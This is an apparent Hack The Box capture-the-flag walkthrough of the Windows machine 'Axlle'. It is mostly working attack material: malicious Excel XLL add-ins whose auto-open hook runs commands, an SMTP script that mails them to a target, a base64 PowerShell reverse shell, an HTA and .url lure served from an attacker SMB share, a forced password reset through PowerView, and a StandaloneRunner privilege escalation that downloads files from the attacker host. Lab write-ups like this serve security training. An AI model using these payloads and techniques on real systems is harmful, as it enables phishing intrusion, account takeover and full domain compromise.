Hack The Box / WINDOWS / 2026-03-27
Hack The Box - Axlle (Windows)
Malicious Excel XLL delivery through internal mail yields foothold, phishing-style HTA/URL pivot gives domain user shell, BloodHound abuse of ForceChangePassword enables lateral movement, and StandaloneRunner writable path abuse escalates to Administrator.
Target
- IP: 10.10.11.21
Recon
sudo nmap -sC -sV 10.10.11.21 -p- -v
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: FAF2C069F86E802FD21BF15DC8EDD2DC
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Axlle Development
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-24 10:56:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=MAINFRAME.axlle.htb
| Issuer: commonName=MAINFRAME.axlle.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-19T11:25:03
| Not valid after: 2024-11-18T11:25:03
| MD5: acc1:ec10:1311:0c34:c548:bd34:8cce:53f9
|_SHA-1: 9d6c:ac58:e52c:a711:9ffa:795f:171b:555c:cf0e:7fc9
| rdp-ntlm-info:
| Target_Name: AXLLE
| NetBIOS_Domain_Name: AXLLE
| NetBIOS_Computer_Name: MAINFRAME
| DNS_Domain_Name: axlle.htb
| DNS_Computer_Name: MAINFRAME.axlle.htb
| DNS_Tree_Name: axlle.htb
| Product_Version: 10.0.20348
|_ System_Time: 2024-06-24T10:56:57+00:00
|_ssl-date: 2024-06-24T10:57:36+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
57803/tcp open msrpc Microsoft Windows RPC
62038/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
62039/tcp open msrpc Microsoft Windows RPC
62473/tcp open msrpc Microsoft Windows RPC
62483/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-06-24T10:56:57
|_ start_date: N/A
Add axlle.htb to /etc/hosts.
Browse http://axlle.htb.
Page message:
Our website is currently down for maintenance.
We apologise for the inconvenience and appreciate your patience as we work to improve our online presence.
If you have any outstanding invoices or requests, please email them to accounts@axlle.htb in Excel format. Please note that all macros are disabled due to our security posture.
We will be back as soon as possible. Thank you for your understanding.
Useful references:
https://blog.talosintelligence.com/xlling-in-excel-malicious-add-ins/
https://stackoverflow.com/questions/9205835/developing-an-excel-xll-using-mac-os-x-linux
Building a Malicious XLL (Attempt 1)
Use a Windows VM.
Install:
- Visual Studio 2022 Community
- .NET desktop development workload
Create a C# class library project.
Open NuGet package manager and install ExcelDna.
Edit ClassLibrary1.csproj:
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<TargetFramework>net8.0-windows</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
<ItemGroup>
<PackageReference Include="ExcelDna.Addin" Version="1.8.0" />
</ItemGroup>
</Project>
Edit Class1.cs to:
using ExcelDna.Integration;
namespace MyNamespace
{
    // Excel-DNA calls AutoOpen when the packed .xll is loaded, so the
    // payload runs as soon as the victim opens the add-in.
    public class MyAddIn : IExcelAddIn
    {
        public void AutoOpen()
        {
            // /C makes cmd.exe exit once the ping has finished
            string strCmdText = "/C ping 10.10.16.42";
            System.Diagnostics.Process.Start("CMD.exe", strCmdText);
        }
        public void AutoClose()
        {
        }
    }
}
Build the solution.
Generated XLL path:
ClassLibrary1\ClassLibrary1\bin\Release\net8.0-windows\publish
If opened in Excel, it launches a terminal and runs ping.
On attacker:
sudo tcpdump -i tun0 icmp
Try sending by email:
swaks --to accounts@axlle.htb --from user@example.com --header "Subject: test" --body 'a' --attach-type 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet' --attach-body @test.xll --server 10.10.11.21
No pingback.
swaks --to accounts@axlle.htb --from user@example.com --header "Subject: test" --body 'a' --attach @test.xll --server 10.10.11.21
Still no callback. Likely cause (not confirmed on the box): an Excel-DNA add-in is a native loader that needs the matching .NET runtime (here .NET 8) installed on the victim before the managed AutoOpen can run, whereas a native XLL built against the Excel SDK has no such dependency. Attempt 2 switches to a native XLL.
Building a Working XLL (Attempt 2)
Useful repository:
https://github.com/moohax/xllpoc
Clone and open in Visual Studio.
Edit XLL_POC.cpp:
#include "stdafx.h"
#include <stdlib.h>   // system()
// Excel calls the exported xlAutoOpen as soon as it loads the XLL, so the
// payload runs at open time with no macro prompt. xlAutoOpen must be exported
// by name; the repository's project already does that.
short __stdcall xlAutoOpen()
{
    system("ping 10.10.16.42");
    return 0;
}
Build solution.
Output file:
xllpoc\XLL_POC\x64\Debug\XLL_POC.dll
Rename it to XLL_POC.xll.
Open in Excel and verify ping execution.
Copy XLL_POC.xll to attacker Linux machine.
sudo tcpdump -i tun0 icmp
swaks --to accounts@axlle.htb --from user@example.com --header "Subject: test" --body 'a' --attach @XLL_POC.xll --server 10.10.11.21
We get a pingback.
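The delivery step above, as an added example that is not part of the original writeup or of swaks: a Python script that builds the same kind of message (plain-text body plus the XLL as an application/octet-stream attachment, which is what a plain swaks --attach sends) and hands it to the target's SMTP server without authentication, as the swaks runs did. Server address, recipient and sender are taken from the page; the 20 MB ceiling is the SIZE value advertised in the nmap banner. The sample bytes used when the functions are exercised without a real XLL are constructed.

```python
"""Deliver an XLL as an e-mail attachment to the target's hMailServer.

Added example for this writeup, not code from the original page or from swaks.
Assumes unauthenticated submission to the local domain is accepted, as the
page's swaks runs show.
"""
import argparse
import smtplib
from email.message import EmailMessage
from email.utils import formatdate, make_msgid

# Advertised by the target's SMTP banner: "SIZE 20480000" (bytes).
SMTP_SIZE_LIMIT = 20480000


def build_mail(sender, recipient, subject, body, attachment_name, attachment_bytes):
    """Return a multipart/mixed message: text body plus one binary attachment.

    The attachment goes out as application/octet-stream, the same as swaks'
    plain --attach; the spreadsheet MIME type tried in attempt 1 is not needed.
    """
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg["Date"] = formatdate(localtime=True)
    msg["Message-ID"] = make_msgid(domain=sender.split("@", 1)[1])
    msg.set_content(body)
    msg.add_attachment(
        attachment_bytes,
        maintype="application",
        subtype="octet-stream",
        filename=attachment_name,
    )
    return msg


def attachment_names(msg):
    """Filenames of all attachments, for a pre-flight look at what is sent."""
    return [part.get_filename() for part in msg.iter_attachments()]


def fits_size_limit(msg, limit=SMTP_SIZE_LIMIT):
    """True if the serialised message stays within the server's SIZE limit."""
    return len(msg.as_bytes()) <= limit


def send_mail(msg, server, port=25):
    """Submit the message to the MTA without authentication.

    Raises ValueError if the server's advertised SIZE would reject it, and
    smtplib.SMTPException if the server refuses the message.
    """
    if not fits_size_limit(msg):
        raise ValueError("message exceeds the server's advertised SIZE limit")
    with smtplib.SMTP(server, port, timeout=30) as smtp:
        smtp.send_message(msg)


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="send an XLL attachment via SMTP")
    ap.add_argument("xll", help="path to the built .xll")
    ap.add_argument("--server", default="10.10.11.21")
    ap.add_argument("--to", default="accounts@axlle.htb")
    ap.add_argument("--sender", default="user@example.com")
    args = ap.parse_args()
    with open(args.xll, "rb") as fh:
        data = fh.read()
    mail = build_mail(args.sender, args.to, "test", "a", "XLL_POC.xll", data)
    print("attaching:", attachment_names(mail))
    send_mail(mail, args.server)
    print("sent", len(mail.as_bytes()), "bytes")
```

Run it as `python3 send_xll.py XLL_POC.xll` with the tcpdump listener from above already running; the size check exists because hMailServer announces SIZE 20480000 and a payload-heavy XLL that exceeds it is rejected after DATA rather than at connect time.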
Initial Reverse Shell
Generate the PowerShell #3 (Base64) payload from revshells.com (attacker 10.10.16.42, port 4444) and replace the system() call in XLL_POC.cpp with:
system("powershell -e <base64 payload>");
Rebuild and copy XLL to attacker.
Start listener:
nc -vlnp 4444
Resend mail.
We get a reverse shell.
Domain User Enumeration
cd \Users
dir
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2024 3:05 AM Administrator
d----- 1/1/2024 3:44 AM baz.humphries
d----- 1/1/2024 3:43 AM brad.shaw
d----- 1/1/2024 3:44 AM calum.scott
d----- 1/1/2024 3:44 AM dallon.matrix
d----- 1/1/2024 3:44 AM dan.kendo
d----- 1/1/2024 5:58 AM gideon.hamill
d----- 1/1/2024 3:44 AM jacob.greeny
d----- 1/1/2024 3:43 AM lindsay.richards
d-r--- 1/22/2023 1:35 AM Public
d----- 1/1/2024 3:43 AM simon.smalls
d----- 1/1/2024 3:44 AM trent.langdon
Useful references:
https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology/phishing-documents#hta-files
https://inquest.net/blog/shortcut-to-malice-url-files/
HTA + URL Lure for New Shell
On attacker:
sudo tcpdump -i tun0 icmp
mkdir smb
cd smb
Create test.hta:
<!-- Basic HTA execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>
<script language="VBScript">
Function Pwn()
    ' WScript.Shell.Run executes the command in the context of whoever opened the HTA
    Set shell = CreateObject("wscript.Shell")
    shell.run "cmd /C ping 10.10.16.42"
End Function
Pwn
</script>
</html>
Create shortcut.url:
[InternetShortcut]
URL=file://10.10.16.42/share/test.hta
Opening the shortcut fetches test.hta from the attacker's SMB share and runs it through mshta, so the command executes as the user who opened it.
On attacker, serve the lure directory over SMB:
impacket-smbserver -smb2support share $(pwd)
On victim (from the foothold shell), drop the shortcut into the current directory:
cp \\10.10.16.42\share\shortcut.url .
Wait for execution.
Pingbacks received.
Start netcat listener and replace ping command with reverse-shell command from revshells.com, then copy the URL shortcut again:
nc -vlnp 4444
cp \\10.10.16.42\share\shortcut.url .
We get a reverse shell as dallon.matrix.
BloodHound and ACL Abuse
Upload SharpHound.exe to target.
On attacker:
impacket-smbserver -smb2support -username test12 -password test12 share $(pwd)
On victim:
net use \\10.10.16.42\share /delete
net use \\10.10.16.42\share test12 /USER:test12
cp \\10.10.16.42\share\SharpHound.exe .
.\SharpHound.exe
cp 20240705084747_BloodHound.zip \\10.10.16.42\share\bloodhound.zip
Start tools:
sudo neo4j console
bloodhound --no-sandbox
Import ZIP in BloodHound.
Finding:
dallon.matrix is in WEB DEVS. WEB DEVS has ForceChangePassword over baz.humphries.
Upload PowerView (https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and load it:
. .\PowerView.ps1
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity baz.humphries -AccountPassword $UserPassword
From BloodHound, baz.humphries has a CanPSRemote edge to the domain controller mainframe.axlle.htb, so the new password gives a WinRM session there.
Connect:
evil-winrm -i 10.10.11.21 -u 'baz.humphries' -p 'Password123!'
Privilege Escalation to Administrator
cd 'C:\App Development\kbfiltr'
type Readme.md
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
Check ACLs:
cd 'C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal'
icacls x64
x64 AXLLE\App Devs:(OI)(CI)(RX,W)
Everyone:(I)(OI)(CI)(R)
AXLLE\Administrator:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(R)
AXLLE\App Devs:(I)(OI)(CI)(RX)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
baz.humphries belongs to App Devs, and the first, non-inherited ACE AXLLE\App Devs:(OI)(CI)(RX,W) grants write on x64 (the other App Devs entry is inherited and read-only), so the directory standalonerunner.exe runs from is writable by us.
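Reading an icacls dump by eye is error-prone, so here is an added example (not code from the original writeup) that parses the output above and answers "can these principals create files in this directory". The sample ACL is the page's icacls x64 output copied as printed, with its indentation lost; the principal set stands in for what whoami /groups returns for baz.humphries and is an assumption. It skips inherit-only (IO) entries, which apply to children rather than the folder itself, and lets a DENY entry override allows.

```python
"""Decide from icacls output whether a set of principals can plant files in a directory.

Added example for this writeup, not code from the original page.
"""
import re

# The page's `icacls x64` output; the first line carries the queried path.
SAMPLE_ICACLS = r"""x64 AXLLE\App Devs:(OI)(CI)(RX,W)
Everyone:(I)(OI)(CI)(R)
AXLLE\Administrator:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(R)
AXLLE\App Devs:(I)(OI)(CI)(RX)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
"""

# Inheritance / scope / type markers icacls prints in their own parentheses.
FLAGS = {"I", "OI", "CI", "IO", "NP", "DENY"}
# Rights that let a principal drop a file or folder into a directory: the
# simple rights F, M, W, the generic GW/GA, and the specific WD (create file /
# write data) and AD (create subfolder / append data).
WRITE_RIGHTS = {"F", "M", "W", "GW", "GA", "WD", "AD"}


def parse_icacls(output, path):
    """Return a list of (principal, flags, rights) triples.

    The first line begins with the queried path; icacls indents the rest, but
    copy-pasted output often loses that, so the path is stripped by name.
    """
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path + " "):
            line = line[len(path) + 1:]
        principal, _, perms = line.partition(":(")
        tokens = re.findall(r"\(([^)]*)\)", "(" + perms)
        flags, rights = set(), set()
        for tok in tokens:
            target = flags if tok in FLAGS else rights
            target.update(t for t in tok.split(",") if t)
        aces.append((principal, frozenset(flags), frozenset(rights)))
    return aces


def write_aces(output, path, principals):
    """Allow ACEs on the directory itself that give one of `principals` a write right."""
    wanted = {p.casefold() for p in principals}
    return [
        (principal, sorted(rights))
        for principal, flags, rights in parse_icacls(output, path)
        if principal.casefold() in wanted
        and "IO" not in flags          # inherit-only: applies to children, not this folder
        and "DENY" not in flags
        and rights & WRITE_RIGHTS
    ]


def writable_by(output, path, principals):
    """True if `principals` can create files here: some allow grants a write
    right and no DENY entry for the same principals takes one away."""
    wanted = {p.casefold() for p in principals}
    denied = any(
        principal.casefold() in wanted and "IO" not in flags
        and "DENY" in flags and rights & WRITE_RIGHTS
        for principal, flags, rights in parse_icacls(output, path)
    )
    return bool(write_aces(output, path, principals)) and not denied


if __name__ == "__main__":
    # Assumed token of baz.humphries: Everyone, Users, App Devs.
    me = {"Everyone", "BUILTIN\\Users", "AXLLE\\App Devs"}
    print("writable:", writable_by(SAMPLE_ICACLS, "x64", me))
    print("because of:", write_aces(SAMPLE_ICACLS, "x64", me))
```

Feed it the group list from whoami /groups on the target and the directory's icacls output; the IO rule is what stops CREATOR OWNER:(I)(OI)(CI)(IO)(F) from being misread as write access to the folder itself.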
List files:
cd 'C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\'
ls
standalonerunner.exe
Reference:
https://github.com/nasbench/Misc-Research/blob/main/LOLBINs/StandaloneRunner.md#putting-everything-together
Start listener:
nc -vlnp 4444
On victim, in the standalonerunner.exe directory (writable by App Devs, see above):
mkdir -p myTestDir\working
Create rsf.rsf and copy it to myTestDir\working.
Create command.txt containing the reverse-shell command from revshells.com and place it next to standalonerunner.exe.
Create reboot.rsf with:
myTestDir
True
Copy it next to standalonerunner.exe as well.
One-liner used, with the three files served over HTTP from the attacker host (this runs in the evil-winrm PowerShell session, where curl is an alias for Invoke-WebRequest and -o resolves to -OutFile):
curl http://10.10.16.42/reboot.rsf -o reboot.rsf; curl http://10.10.16.42/command.txt -o command.txt; mkdir -p myTestDir\working; curl http://10.10.16.42/rsf.rsf -o myTestDir\working\rsf.rsf
Wait for the automated run described in the Readme to pick up reboot.rsf.
We get a reverse shell as Administrator.